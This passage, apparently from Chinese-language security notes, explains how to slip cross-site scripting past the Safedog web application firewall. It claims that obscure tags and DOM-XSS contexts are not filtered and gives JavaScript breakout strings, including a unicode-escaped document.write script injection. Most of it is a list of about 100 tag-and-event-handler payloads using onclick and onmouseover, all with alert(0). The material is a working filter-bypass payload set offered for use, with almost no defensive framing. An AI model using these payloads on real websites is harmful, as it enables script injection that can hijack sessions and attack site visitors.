特别小众的标签也可以绕过安全狗的规则, 比如acronym address 翻翻 w3c 的教程能找出好多

dom-xss

安全狗不存在 dom-xss 的拦截规则

基本上没有尖括号就可以绕过了, 或者使用上面的 payload

由于上下文是在 JavaScript 的环境内, 会有很多的变形

";alert(0);//
";document.write("\u003cscript\u003ealert(0)\u003c\u002fscript\u003e");//

总之先闭合 然后直接弹窗 or 用docment.write 写标签

payloads

<a onclick="javascript:alert(0)">a
<javascript onclick="javascript:alert(0)">a
<b onclick="javascript:alert(0)">a
<abbr onclick="javascript:alert(0)">a
<acronym onclick="javascript:alert(0)">a
<address onclick="javascript:alert(0)">a
<applet onclick="javascript:alert(0)">a
<article onclick="javascript:alert(0)">a
<xss onclick="javascript:alert(0)">a
<aside onclick="javascript:alert(0)">a
<bdi onclick="javascript:alert(0)">a
<bdo onclick="javascript:alert(0)">a
<big onclick="javascript:alert(0)">a
<button onclick="javascript:alert(0)">a
<del onclick="javascript:alert(0)">a
<details onclick="javascript:alert(0)">a
<div onclick="javascript:alert(0)">a
<dfn onclick="javascript:alert(0)">a
<dl onclick="javascript:alert(0)">a
<dt onclick="javascript:alert(0)">a
<h1 onclick="javascript:alert(0)">a
<h2 onclick="javascript:alert(0)">a
<h3 onclick="javascript:alert(0)">a
<h4 onclick="javascript:alert(0)">a
<h5 onclick="javascript:alert(0)">a
<h6 onclick="javascript:alert(0)">a
<header onclick="javascript:alert(0)">a
<hr onclick="javascript:alert(0)">a
<html onclick="javascript:alert(0)">a
<kbd onclick="javascript:alert(0)">a
<map onclick="javascript:alert(0)">a
<mark onclick="javascript:alert(0)">a
<menu onclick="javascript:alert(0)">a
<menuitem onclick="javascript:alert(0)">a
<meter onclick="javascript:alert(0)">a
<q onclick="javascript:alert(0)">a
<var onclick="javascript:alert(0)">a
<xmp onclick="javascript:alert(0)">a
<addons onclick="javascript:alert(0)">a
<ascii onclick="javascript:alert(0)">a
<aspx onclick="javascript:alert(0)">a
<java onclick="javascript:alert(0)">a
<mobile onclick="javascript:alert(0)">a
<go onclick="javascript:alert(0)">a
<alibaba onclick="javascript:alert(0)">a
<baidu onclick="javascript:alert(0)">a
<google onclick="javascript:alert(0)">a
<github onclick="javascript:alert(0)">a
<acu onclick="javascript:alert(0)">a
<mail onclick="javascript:alert(0)">a
<a onmouseover="javascript:alert(0)">a
<javascript onmouseover="javascript:alert(0)">a
<b onmouseover="javascript:alert(0)">a
<abbr onmouseover="javascript:alert(0)">a
<acronym onmouseover="javascript:alert(0)">a
<address onmouseover="javascript:alert(0)">a
<applet onmouseover="javascript:alert(0)">a
<article onmouseover="javascript:alert(0)">a
<xss onmouseover="javascript:alert(0)">a
<aside onmouseover="javascript:alert(0)">a
<bdi onmouseover="javascript:alert(0)">a
<bdo onmouseover="javascript:alert(0)">a
<big onmouseover="javascript:alert(0)">a
<button onmouseover="javascript:alert(0)">a
<del onmouseover="javascript:alert(0)">a
<details onmouseover="javascript:alert(0)">a
<div onmouseover="javascript:alert(0)">a
<dfn onmouseover="javascript:alert(0)">a
<dl onmouseover="javascript:alert(0)">a
<dt onmouseover="javascript:alert(0)">a
<h1 onmouseover="javascript:alert(0)">a
<h2 onmouseover="javascript:alert(0)">a
<h3 onmouseover="javascript:alert(0)">a
<h4 onmouseover="javascript:alert(0)">a
<h5 onmouseover="javascript:alert(0)">a
<h6 onmouseover="javascript:alert(0)">a
<header onmouseover="javascript:alert(0)">a
<hr onmouseover="javascript:alert(0)">a
<html onmouseover="javascript:alert(0)">a
<kbd onmouseover="javascript:alert(0)">a
<map onmouseover="javascript:alert(0)">a
<mark onmouseover="javascript:alert(0)">a
<menu onmouseover="javascript:alert(0)">a
<menuitem onmouseover="javascript:alert(0)">a
<meter onmouseover="javascript:alert(0)">a
<q onmouseover="javascript:alert(0)">a
<var onmouseover="javascript:alert(0)">a
<xmp onmouseover="javascript:alert(0)">a
<addons onmouseover="javascript:alert(0)">a
<ascii onmouseover="javascript:alert(0)">a
<aspx onmouseover="javascript:alert(0)">a
<java onmouseover="javascript:alert(0)">a
<mobile onmouseover="javascript:alert(0)">a
<go onmouseover="javascript:alert(0)">a
<alibaba onmouseover="javascript:alert(0)">a
<baidu onmouseover="javascript:alert(0)">a
<google onmouseover="javascript:alert(0)">a
<github onmouseover="javascript:alert(0)">a
<acu onmouseover="javascript:alert(0)">a
<mail onmouseover="javascript:alert(0)">a